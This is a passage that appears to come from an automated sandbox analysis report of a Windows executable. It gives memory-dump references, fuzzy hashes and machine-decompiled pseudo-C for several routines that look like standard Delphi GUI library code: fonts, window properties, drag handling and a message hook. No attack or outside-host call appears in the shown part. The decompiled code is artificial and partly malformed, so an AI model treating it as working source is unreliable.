Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof String ID: API String ID: 3473537107-0 Opcode ID: 5d89a7fb75850f26319e684402d0780e3acc06d2bdee2c569710ca98c6396b59 Instruction ID: 11fe1cfdb4414f926eae3f9df9586ded9b707078bdbb83b49df9978c7684b3c8 Opcode Fuzzy Hash: 5d89a7fb75850f26319e684402d0780e3acc06d2bdee2c569710ca98c6396b59 Instruction Fuzzy Hash: D0F0ADB36042146F8744EF6EAC81D9B7BECEE88364310012FF908D7242DA38ED118778

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%

E004383DC(struct HWND__* __eax, void* __ecx) { intOrPtr _t9; signed int _t16; struct HWND__* _t19; DWORD* _t20; _t17 = __ecx; _push(__ecx); _t19 = __eax; _t16 = 0; if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() == *_t20) { _t9 = *0x466504; // 0x27ea898 if(GlobalFindAtomA(E00404C00(_t9)) != *0x466500) { _t16 = 0 | E00437448(_t19, _t17) != 0x00000000; } else { _t16 = 0 | GetPropA(_t19, *0x466500 & 0x0000ffff) != 0x00000000; } } return _t16; } 0x004383dc 0x004383de 0x004383df 0x004383e1 0x004383e5 0x004383fc 0x00438413 0x00438433 0x00438415 0x00438425 0x00438425 0x00438413 0x0043843b

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 004383E9 GetCurrentProcessId.KERNEL32(00000000,?,?,-00000010,00000000,00438454,-000000F7,?,00000000,0043800E,?,-00000010,?), ref: 004383F2 GlobalFindAtomA.KERNEL32(00000000), ref: 00438407 GetPropA.USER32 ref: 0043841E

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow String ID: API String ID: 2582817389-0 Opcode ID: c8253abe16581fcb99d44ece300b1cfe7add3b6cfb4c013908db5c544134e519 Instruction ID: edcf506c367d5b21f12e8bc81a0964d5f28cf71cb3e8e791f3115fe585ddaeb4 Opcode Fuzzy Hash: c8253abe16581fcb99d44ece300b1cfe7add3b6cfb4c013908db5c544134e519 Instruction Fuzzy Hash: D3F0276120622367D2307B726D4287F514C8D143A4B81503FFD00E2141FB6CDC52A1BF

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%

E0043747C(struct HWND__* __eax, void* __ecx) { intOrPtr _t5; struct HWND__* _t12; void* _t15; DWORD* _t16; _t13 = __ecx; _push(__ecx); _t12 = __eax; _t15 = 0; if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() == *_t16) { _t5 = *0x466508; // 0x27f1cc0 if(GlobalFindAtomA(E00404C00(_t5)) != *0x466502) { _t15 = E00437448(_t12, _t13); } else { _t15 = GetPropA(_t12, *0x466502 & 0x0000ffff); } } return _t15; } 0x0043747c 0x0043747e 0x0043747f 0x00437481 0x00437485 0x0043749c 0x004374b3 0x004374ce 0x004374b5 0x004374c3 0x004374c3 0x004374b3 0x004374d5

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 00437489 GetCurrentProcessId.KERNEL32(?,00460C02,00000000,004586E9,?,?,00460C02,00000001,00456D34,?,00000000,00000000,00000000,00000001), ref: 00437492 GlobalFindAtomA.KERNEL32(00000000), ref: 004374A7 GetPropA.USER32 ref: 004374BE

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow String ID: API String ID: 2582817389-0 Opcode ID: c8e0bd2b717ad0fe8b96e023d763a59c78b2238a2bd2172c60bb73f231bb40c6 Instruction ID: a2f4f6fb400889014e80e2d2de551d02392c32fcff4c83d9196b20b4c67440de Opcode Fuzzy Hash: c8e0bd2b717ad0fe8b96e023d763a59c78b2238a2bd2172c60bb73f231bb40c6 Instruction Fuzzy Hash: F2F0A7E120811476D53077B66C8282B198C8928368F02657BFA82E3297D56CEC4142BE

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0045539C(void* __ecx) { void* _t2; DWORD* _t7; _t2 = *0x466580; // 0x27bf470 if( *((char*)(_t2 + 0xad)) == 0) { if( *0x466598 == 0) { _t2 = SetWindowsHookExA(3, E00455358, 0, GetCurrentThreadId()); *0x466598 = _t2; } if( *0x466594 == 0) { _t2 = CreateEventA(0, 0, 0, 0); *0x466594 = _t2; } if( *0x46659c == 0) { _t2 = CreateThread(0, 0x3e8, E004552FC, 0, 0, _t7); *0x46659c = _t2; } } return _t2; } 0x0045539d 0x004553a9 0x004553b2 0x004553c4 0x004553c9 0x004553c9 0x004553d5 0x004553df 0x004553e4 0x004553e4 0x004553f0 0x00455403 0x00455408 0x00455408 0x004553f0 0x0045540e

APIs

GetCurrentThreadId.KERNEL32 ref: 004553B4 SetWindowsHookExA.USER32 ref: 004553C4 CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,0045834E), ref: 004553DF CreateThread.KERNEL32 ref: 00455403

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateThread$CurrentEventHookWindows String ID: API String ID: 1195359707-0 Opcode ID: 096523d17a34ecf0d97c422ae2d5a8432442c6bfb133b99b9dcf8aa6461ea1bb Instruction ID: a9d03a39fb95b2e519a0ab36c9fe0646124770ff35457d36c1f1fd7bedb10476 Opcode Fuzzy Hash: 096523d17a34ecf0d97c422ae2d5a8432442c6bfb133b99b9dcf8aa6461ea1bb Instruction Fuzzy Hash: A6F01D70784780BEF610AB21BC17B2636949715B16F21517AF50A791D7E2F824888A5E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E0042ACC4() { signed char _v28; void* _t4; signed int _t8; struct HDC__* _t9; struct tagTEXTMETRICA* _t10; _t8 = 1; _t9 = GetDC(0); if(_t9 != 0) { _t4 = *0x466360; // 0x58a00b4 if(SelectObject(_t9, _t4) != 0 && GetTextMetricsA(_t9, _t10) != 0) { _t8 = _v28 & 0x000000ff; } ReleaseDC(0, _t9); } return _t8; } 0x0042acc9 0x0042acd2 0x0042acd6 0x0042acd8 0x0042ace6 0x0042acf3 0x0042acf3 0x0042acfb 0x0042acfb 0x0042ad07

APIs

GetDC.USER32(00000000), ref: 0042ACCD SelectObject.GDI32(00000000,058A00B4), ref: 0042ACDF GetTextMetricsA.GDI32(00000000), ref: 0042ACEA ReleaseDC.USER32 ref: 0042ACFB

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsObjectReleaseSelectText String ID: API String ID: 2013942131-0 Opcode ID: 7c5f333ca835aeb22dd702a433e5b6b0fb194056d32f62b4152f717a2231f0a9 Instruction ID: de7c194213a4f2e578b42373dec20c7b80f31d2e9068f76ebd383a2718700f4b Opcode Fuzzy Hash: 7c5f333ca835aeb22dd702a433e5b6b0fb194056d32f62b4152f717a2231f0a9 Instruction Fuzzy Hash: 23E0DF1174A23123D21032663C82BAB218C4F023A5F89013BFD24E93C1DA0DCD2083FF

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 70%

E00438C24(signed int __eax) { signed int _v5; signed int _v12; signed int _v13; intOrPtr _v17; intOrPtr _v21; void* __ebx; void* __ebp; signed int _t46; signed int _t47; signed int _t48; signed int _t49; signed int _t52; signed int _t53; void* _t54; signed int _t55; struct HICON__* _t56; intOrPtr _t61; signed int _t65; signed int _t69; signed int _t71; void* _t72; signed int _t76; signed int _t77; void* _t80; signed int _t81; intOrPtr _t82; signed int _t87; signed int _t90; signed int _t91; intOrPtr* _t97; void* _t100; signed int _t104; intOrPtr _t113; intOrPtr _t116; signed int _t118; signed int _t120; signed int _t122; signed int _t124; intOrPtr _t127; signed int _t128; signed int _t129; intOrPtr _t136; intOrPtr _t138; void* _t140; void* _t141; void* _t143; void* _t145; intOrPtr _t146; _t46 = __eax; _t143 = _t145; _t146 = _t145 + 0xffffffec; _v5 = __eax; _t97 = 0; _v13 = 0; if( *0x466514 == 0) { L36: return _t46; } else { _t46 = *0x466514; // 0x0 if( *((char*)(_t46 + 5)) != 0) { goto L36; } else { _push(_t143); _push(0x438f39); _push( *[fs:edx]); *[fs:edx] = _t146; _t47 = *0x466514; // 0x0 *0x466540 = _t47; _push(_t143); _push(0x438ec7); _push( *[fs:edx]); *[fs:edx] = _t146; _t48 = *0x466514; // 0x0 *((char*)(_t48 + 5)) = 1; _t49 = *0x466514; // 0x0 *((char*)(_t49 + 0x20)) = _v5 & 0x000000ff; _t113 = *0x46651c; // 0x0 E00437AA4(_t113); if( *0x466530 == 2) { _t91 = *0x466514; // 0x0 _t138 = *0x43519c; // 0x4351e8 _t97 = E00403AD8(_t91, _t138); *((char*)(_t97 + 0x74)) = *((intOrPtr*)( *_t97 + 0x34))() & 0xffffff00 | *((intOrPtr*)(_t97 + 8)) == 0x00000000; } _t52 = *0x466514; // 0x0 if( *((intOrPtr*)(_t52 + 8)) == 0) { L7: _t53 = *0x466514; // 0x0 _v21 = *((intOrPtr*)(_t53 + 0x10)); _t115 = *((intOrPtr*)(_t53 + 0x14)); _v17 = *((intOrPtr*)(_t53 + 0x14)); } else { _t87 = *0x466514; // 0x0 _t136 = *0x4362e8; // 0x436334 if(E00403AB4( *((intOrPtr*)(_t87 + 8)), _t136) == 0) { goto L7; } else { _t90 = *0x466514; // 0x0 _v21 = *((intOrPtr*)(_t90 + 0x18)); _t115 = *((intOrPtr*)(_t90 + 0x1c)); _v17 = *((intOrPtr*)(_t90 + 0x1c)); } } _t54 = E00438BB0(_t143); _pop(_t100); if(_t54 == 0) { L14: _t55 = 0; } else { if( *0x466530 != 2 || *((char*)(_t97 + 0x74)) == 0) { if( *0x466530 == 0) { goto L14; } else { E004384B8(1); if(1 == 0) { goto L14; } else { goto L13; } } } else { L13: if(_v5 != 0) { _t55 = 1; } else { goto L14; } } } _v13 = _t55; if( *0x466530 != 2) { __eflags = *0x466534; if(__eflags == 0) { _t56 = *0x466528; // 0x0 SetCursor(_t56); } else { _t77 = *0x466534; // 0x0 E004440E4(_t77, _t115, __eflags); } } else { if(_v13 != 0 && *((char*)(_t97 + 0x74)) != 0) { _t80 = E0044CE28( *((intOrPtr*)(_t97 + 0x40))); if(_t80 != 0 && *((intOrPtr*)(_t80 + 0x268)) == *((intOrPtr*)(_t97 + 0x40))) { E00451654(_t80, _t97, _t100, 0, _t140, _t141); } _t81 = *0x466514; // 0x0 _t82 = *0x466510; // 0x0 E0043BC9C(_t82, 0, 0xb03a, _t81); } } *0x466510 = 0; *0x466514 = 0; if( *0x466540 == 0) { L33: _pop(_t116); *[fs:eax] = _t116; _push(0x438ece); _t61 = *0x46653c; // 0x0 E00403928(_t61); *0x46653c = 0; __eflags = *0x466540; if( *0x466540 != 0) { _t65 = *0x466540; // 0x0 *((char*)(_t65 + 5)) = 0; _t69 = *0x466540; // 0x0 *((intOrPtr*)( *_t69))(_v13 & 0x000000ff, _v17); } __eflags = 0; *0x466514 = 0; return 0; } else { _t71 = *0x466540; // 0x0 if( *((intOrPtr*)(_t71 + 8)) == 0) { goto L33; } else { _t72 = 3; if(_v13 == 0) { _t72 = 4; _t128 = *0x466540; // 0x0 *((intOrPtr*)(_t128 + 0x10)) = 0; _t129 = *0x466540; // 0x0 *((intOrPtr*)(_t129 + 0x14)) = 0; _v21 = 0; _v17 = 0; } _t118 = *0x466540; // 0x0 _v12 = _t118; _push(_t143); _push(0x438e6b); _push( *[fs:edx]); *[fs:edx] = _t146; _t120 = *0x466540; // 0x0 _t122 = *0x466540; // 0x0 _t124 = *0x466540; // 0x0 _t104 = *0x466540; // 0x0 E00438384( *((intOrPtr*)(_t124 + 0xc)), _t104, _t72, _t122 + 0x10, *((intOrPtr*)(_t120 + 8))); _pop(_t127); *[fs:eax] = _t127; _push(0x438e72); if( *0x466540 == 0) { _t76 = _v12; *0x466540 = _t76; return _t76; } return 0; } } } } } 0x00438c24 0x00438c25 0x00438c27 0x00438c2b 0x00438c2e 0x00438c30 0x00438c3b 0x00438f40 0x00438f44 0x00438c41 0x00438c41 0x00438c4a 0x00000000 0x00438c50 0x00438c52 0x00438c53 0x00438c58 0x00438c5b 0x00438c5e 0x00438c63 0x00438c6a 0x00438c6b 0x00438c70 0x00438c73 0x00438c76 0x00438c7b 0x00438c7f 0x00438c88 0x00438c8b 0x00438c96 0x00438ca2 0x00438ca4 0x00438ca9 0x00438cb4 0x00438cc4 0x00438cc4 0x00438cc7 0x00438cd0 0x00438cfc 0x00438cfc 0x00438d04 0x00438d07 0x00438d0a 0x00438cd2 0x00438cd2 0x00438cda 0x00438ce7 0x00000000 0x00438ce9 0x00438ce9 0x00438cf1 0x00438cf4 0x00438cf7 0x00438cf7 0x00438ce7 0x00438d0e 0x00438d13 0x00438d16 0x00438d41 0x00438d41 0x00438d18 0x00438d1f 0x00438d2e 0x00000000 0x00438d30 0x00438d32 0x00438d39 0x00000000 0x00000000 0x00000000 0x00000000 0x00438d39 0x00438d3b 0x00438d3b 0x00438d3f 0x00438d45 0x00000000 0x00000000 0x00000000 0x00438d3f 0x00438d1f 0x00438d47 0x00438d51 0x00438d98 0x00438d9f 0x00438dad 0x00438db3 0x00438da1 0x00438da1 0x00438da6 0x00438da6 0x00438d53 0x00438d57 0x00438d64 0x00438d6b 0x00438d7a 0x00438d7a 0x00438d7f 0x00438d8c 0x00438d91 0x00438d91 0x00438d57 0x00438dba 0x00438dc1 0x00438dcd 0x00438e72 0x00438e74 0x00438e77 0x00438e7a 0x00438e7f 0x00438e84 0x00438e8b 0x00438e90 0x00438e97 0x00438e99 0x00438e9e 0x00438eb6 0x00438ebd 0x00438ebd 0x00438ebf 0x00438ec1 0x00438ec6 0x00438dd3 0x00438dd3 0x00438ddc 0x00000000 0x00438de2 0x00438de2 0x00438de8 0x00438dea 0x00438dec 0x00438df4 0x00438df7 0x00438dff 0x00438e04 0x00438e09 0x00438e09 0x00438e0c 0x00438e12 0x00438e17 0x00438e18 0x00438e1d 0x00438e20 0x00438e23 0x00438e2d 0x00438e37 0x00438e40 0x00438e47 0x00438e4e 0x00438e51 0x00438e54 0x00438e60 0x00438e62 0x00438e65 0x00000000 0x00438e65 0x00438e6a 0x00438e6a 0x00438ddc 0x00438dcd 0x00438c4a

APIs

Part of subcall function 00437AA4: ReleaseCapture.USER32(00000000,00438C9B,00000000,00438EC7,?,00000000,00438F39), ref: 00437AA7 SetCursor.USER32(00000000,00000000,00438EC7,?,00000000,00438F39), ref: 00438DB3 Part of subcall function 004440E4: ImageList_EndDrag.COMCTL32(?,-00000010,00438769), ref: 00444100

Strings

4cC , xrefs: 00438CDA QC , xrefs: 00438CA9

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CaptureCursorDragImageList_Release String ID: 4cC$QC API String ID: 1302740870-1275598162 Opcode ID: fde60272e4a0214f13f4deac0b405d54ad89552e2e762a055d0ae2e8f1311e0a Instruction ID: dc2065d6e0f599aa4aa913a50c49f208dad52c561c5e25ae754aa2762872304a Opcode Fuzzy Hash: fde60272e4a0214f13f4deac0b405d54ad89552e2e762a055d0ae2e8f1311e0a Instruction Fuzzy Hash: 69819670604340AFD715CF18E846B56FBE1BB58308F1591BBE805873AAEB789941CB9A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%

E0042590C(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) { signed int _v8; struct tagLOGFONTA _v68; int _v72; char _v76; char _v80; char _v84; intOrPtr _t87; intOrPtr _t91; intOrPtr _t97; signed int _t106; char* _t110; int _t115; intOrPtr* _t121; void* _t124; void* _t138; intOrPtr _t149; int _t161; int* _t162; int _t164; void* _t167; void* _t168; intOrPtr _t169; int* _t181; _t167 = _t168; _t169 = _t168 + 0xffffffb0; _v84 = 0; _v80 = 0; _v76 = 0; _v72 = 0; _t138 = __eax; _push(_t167); _push(0x425b28); _push( *[fs:eax]); *[fs:eax] = _t169; _v8 = *((intOrPtr*)(__eax + 0x10)); if( *((intOrPtr*)(_v8 + 8)) != 0) { __eflags = 0; *[fs:eax] = 0; _push(E00425B2F); return E00404760( &_v84, 4); } else { _t87 = *0x466398; // 0x27f1bc8 E00424BEC(_t87); _push(_t167); _push(0x425b00); _push( *[fs:edx]); *[fs:edx] = _t169; if( *((intOrPtr*)(_v8 + 8)) == 0) { _t12 = _v8 + 0x14; // 0xe8c38bd6 _v68.lfHeight = *_t12; _v68.lfWidth = 0; _t16 = _v8 + 0x18; // 0xffffff88 _t97 = *_t16; _v68.lfEscapement = _t97; _v68.lfOrientation = _t97; if(( *(_v8 + 0x1d) & 0x00000001) == 0) { _v68.lfWeight = 0x190; } else { _v68.lfWeight = 0x2bc; } _v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x1d) & 0x00000002) != 0x00000000; _v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x1d) & 0x00000004) != 0x00000000; _v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x1d) & 0x00000008) != 0x00000000; _t47 = _v8 + 0x1e; // 0x5a590424 _t106 = *_t47 & 0x000000ff; if(_t106 != 1) { L8: _v68.lfCharSet = _t106; } else { _t177 = *0x461c3a - 1; if( *0x461c3a == 1) { goto L8; } else { _v68.lfCharSet = *0x461c3a & 0x000000ff; } } E004049A0( &_v72, _v8 + 0x1f, _t177); _t164 = _v72; if(_t164 != 0) { _t164 = *(_t164 - 4); } _t161 = "Default"; if(_t161 != 0) { _t162 = _t161 - 4; _t181 = _t162; _t161 = *_t162; } _t110 = E00404C00("Default"); E004049A0( &_v76, _v8 + 0x1f, _t181); _t115 = CompareStringA(0x400, 1, E00404C00(_v76), _t164, _t110, _t161); _t182 = _t115 != 2; if(_t115 != 2) { __eflags = _v8 + 0x1f; E004049A0( &_v84, _v8 + 0x1f, _v8 + 0x1f); E004090B0( &(_v68.lfFaceName), _v84); } else { E004049A0( &_v80, 0x461c3b, _t182); E004090B0( &(_v68.lfFaceName), _v80); } _t121 = *0x462f2c; // 0x4617c0 if( *_t121 == 1 && E0042ACC4() == 0x80 && E004258E0(_v8 + 0x10) != 0) { _v68.lfCharSet = 0x80; } _v68.lfQuality = 0; if(_v68.lfOrientation == 0) { _v68.lfOutPrecision = 0; } else { _v68.lfOutPrecision = 7; } _v68.lfClipPrecision = 0; _t124 = E00425C84(_t138) - 1; if(_t124 == 0) { _v68.lfPitchAndFamily = 2; } else { if(_t124 == 1) { _v68.lfPitchAndFamily = 1; } else { _v68.lfPitchAndFamily = 0; } } *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68); } _pop(_t149); *[fs:eax] = _t149; _push(E00425B07); _t91 = *0x466398; // 0x27f1bc8 return E00424BF8(_t91); } } 0x0042590d 0x0042590f 0x00425917 0x0042591a 0x0042591d 0x00425920 0x00425923 0x00425927 0x00425928 0x0042592d 0x00425930 0x00425936 0x00425940 0x00425b0d 0x00425b12 0x00425b15 0x00425b27 0x00425946 0x00425946 0x0042594b 0x00425952 0x00425953 0x00425958 0x0042595b 0x00425965 0x0042596e 0x00425971 0x00425976 0x0042597c 0x0042597c 0x0042597f 0x00425982 0x0042598c 0x00425997 0x0042598e 0x0042598e 0x0042598e 0x004259a8 0x004259b5 0x004259c2 0x004259c8 0x004259c8 0x004259ce 0x004259e5 0x004259e5 0x004259d0 0x004259d0 0x004259d7 0x00000000 0x004259d9 0x004259e0 0x004259e0 0x004259d7 0x004259f1 0x004259f6 0x004259fb 0x00425a00 0x00425a00 0x00425a02 0x00425a09 0x00425a0b 0x00425a0b 0x00425a0e 0x00425a0e 0x00425a16 0x00425a26 0x00425a3b 0x00425a43 0x00425a45 0x00425a67 0x00425a6a 0x00425a75 0x00425a47 0x00425a4f 0x00425a5a 0x00425a5a 0x00425a7a 0x00425a82 0x00425a9c 0x00425a9c 0x00425aa0 0x00425aa8 0x00425ab0 0x00425aaa 0x00425aaa 0x00425aaa 0x00425ab4 0x00425abf 0x00425ac1 0x00425ac9 0x00425ac3 0x00425ac5 0x00425acf 0x00425ac7 0x00425ad5 0x00425ad5 0x00425ac5 0x00425ae5 0x00425ae5 0x00425aea 0x00425aed 0x00425af0 0x00425af5 0x00425aff 0x00425aff

APIs

Part of subcall function 00424BEC: EnterCriticalSection.KERNEL32(027F1C10,004261DF), ref: 00424BF0 CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000,Default,00000000,00425B00,?,00000000,00425B28,?,?,?,?), ref: 00425A3B CreateFontIndirectA.GDI32(?), ref: 00425ADD

Strings

Default , xrefs: 00425A02, 00425A10, 00425A11

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CompareCreateCriticalEnterFontIndirectSectionString String ID: Default API String ID: 249151401-753088835 Opcode ID: b1e62e2ab3e285c66bfabbfe6c2abf817a5687709a25f266933a54f1d7d2a055 Instruction ID: cdc74d9fd1ebb00f32cf96949c10078f4083309e396aabd750659c696ce78f0f Opcode Fuzzy Hash: b1e62e2ab3e285c66bfabbfe6c2abf817a5687709a25f266933a54f1d7d2a055 Instruction Fuzzy Hash: 6961C570B04658DFDB10DFA8D481B9EBBF5AF49304FA54066E400B7392D378AE41CB59

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00446F1C(int __eax, signed int __ecx, void* __edx, void* __fp0, char* _a4, intOrPtr _a8, intOrPtr _a12) { signed int _v5; char _v12; struct tagMSG _v40; char _v48; void* __ebp; int _t33; int _t40; intOrPtr _t41; char* _t42; int _t45; int _t58; intOrPtr _t72; int _t79; int _t80; void* _t81; void* _t87; _t87 = __fp0; _t33 = __eax; _v5 = __ecx; _t58 = __eax; if(__edx != 0) { L17: return _t33; } _t83 = _v5 & 0x00000040; if((_v5 & 0x00000040) == 0) { E0041938C(_a12, &_v48, _a8); _t61 = &_v12; _t33 = E00445384(_t58, &_v12, &_v48, __eflags); _t79 = _t33; __eflags = _t79; if(_t79 == 0) { goto L17; } __eflags = _v12 - 0x12; if(__eflags != 0) { __eflags = _v12 - 2; if(_v12 != 2) { goto L17; } _t40 = PeekMessageA( &_v40, E004423F8( *((intOrPtr*)(_t58 + 0x14))), 0x203, 0x203, 0); __eflags = _t40; if(_t40 == 0) { _t72 = *0x4369e8; // 0x436a34 _t45 = E00403AB4( *((intOrPtr*)(_t79 + 4)), _t72); __eflags = _t45; if(_t45 != 0) { *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t79 + 4)))) + 0xd4))(); } } _t41 = *((intOrPtr*)(_t79 + 4)); __eflags = *((char*)(_t41 + 0x8f)) - 1; if( *((char*)(_t41 + 0x8f)) == 1) { __eflags = *((char*)(_t41 + 0x5d)) - 1; if( *((char*)(_t41 + 0x5d)) == 1) { __eflags = 0; E0043B120(_t41, _t61 | 0xffffffff, 0, _t81, _t87); } } _t42 = _a4; *_t42 = 1; return _t42; } E0041938C(_a12, &_v48, _a8); return E00446600(_t58, &_v48, _t79, __eflags); } E0041938C(_a12, &_v48, _a8); _t33 = E00445384(_t58, &_v12, &_v48, _t83); _t80 = _t33; if(_t80 != 0 && *((intOrPtr*)(_t80 + 4)) != 0 && _v12 == 2) { E00438F48(); return E0043B7E4( *((intOrPtr*)(_t80 + 4)), 0, 0, 1); } goto L17; } 0x00446f1c 0x00446f1c 0x00446f24 0x00446f27 0x00446f2b 0x0044703b 0x0044703b 0x0044703b 0x00446f31 0x00446f35 0x00446f91 0x00446f99 0x00446f9e 0x00446fa3 0x00446fa5 0x00446fa7 0x00000000 0x00000000 0x00446fad 0x00446fb1 0x00446fcf 0x00446fd3 0x00000000 0x00000000 0x00446fee 0x00446ff3 0x00446ff5 0x00446ffa 0x00447000 0x00447005 0x00447007 0x0044700e 0x0044700e 0x00447007 0x00447014 0x00447017 0x0044701e 0x00447020 0x00447024 0x00447029 0x0044702b 0x0044702b 0x00447024 0x00447030 0x00447033 0x00000000 0x00447033 0x00446fbc 0x00000000 0x00446fc8 0x00446f40 0x00446f4d 0x00446f52 0x00446f56 0x00446f70 0x00000000 0x00446f7e 0x00000000

Strings

@ , xrefs: 00446F31 4jC , xrefs: 00446FFA

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: PointsWindow String ID: 4jC$@ API String ID: 4123100037-871394707 Opcode ID: 28da6f578e5690cc0c5caff51d9c003871ca2833c0e4f4482c9042230a3108b2 Instruction ID: 86af40c0e3280406c22fdaa537b1eb5ee5ae63b826341ce694b4907392a73c8c Opcode Fuzzy Hash: 28da6f578e5690cc0c5caff51d9c003871ca2833c0e4f4482c9042230a3108b2 Instruction Fuzzy Hash: 5131A230A052089BEF20DF68C895BDEB7A5AF14354F00C1ABEC5167382CB78ED45CB99

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%

E0040C572(void* __ebx, void* __esi, intOrPtr _a4) { char _v8; struct _MEMORY_BASIC_INFORMATION _v36; char _v297; char _v304; intOrPtr _v308; char _v312; char _v316; char _v320; intOrPtr _v324; char _v328; void* _v332; char _v336; char _v340; char _v344; char _v348; intOrPtr _v352; char _v356; char _v360; char _v364; void* _v368; char _v372; intOrPtr _t52; intOrPtr _t60; intOrPtr _t82; intOrPtr _t86; intOrPtr _t89; intOrPtr _t100; void* _t107; intOrPtr _t109; void* _t112; _v372 = 0; _v336 = 0; _v344 = 0; _v340 = 0; _v8 = 0; _push(_t112); _push(0x40c72f); _push( *[fs:eax]); *[fs:eax] = _t112 + 0xfffffe90; _t89 = *((intOrPtr*)(_a4 - 4)); if( *((intOrPtr*)(_t89 + 0x14)) != 0) { _t52 = *0x462dac; // 0x407654 E00406740(_t52, &_v8); } else { _t86 = *0x462f40; // 0x40764c E00406740(_t86, &_v8); } _t109 = *((intOrPtr*)(_t89 + 0x18)); VirtualQuery( *(_t89 + 0xc), &_v36, 0x1c); if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase, &_v297, 0x105) == 0) { _v368 = *(_t89 + 0xc); _v364 = 5; _v360 = _v8; _v356 = 0xb; _v352 = _t109; _v348 = 5; _t60 = *0x462db8; // 0x4075fc E00406740(_t60, &_v372); E0040C158(_t89, _v372, 1, _t107, _t109, "true", &_v368); } else { _v332 = *(_t89 + 0xc); _v328 = 5; E004049AC( &_v340, 0x105, &_v297); E00408F20(_v340, &_v336); _v324 = _v336; _v320 = 0xb; _v316 = _v8; _v312 = 0xb; _v308 = _t109; _v304 = 5; _t82 = *0x462e34; // 0x407714 E00406740(_t82, &_v344); E0040C158(_t89, _v344, 1, _t107, _t109, 3, &_v332); } _pop(_t100); *[fs:eax] = _t100; _push(E0040C736); E0040473C( &_v372); E00404760( &_v344, 3); return E0040473C( &_v8); } 0x0040c581 0x0040c587 0x0040c58d 0x0040c593 0x0040c599 0x0040c59e 0x0040c59f 0x0040c5a4 0x0040c5a7 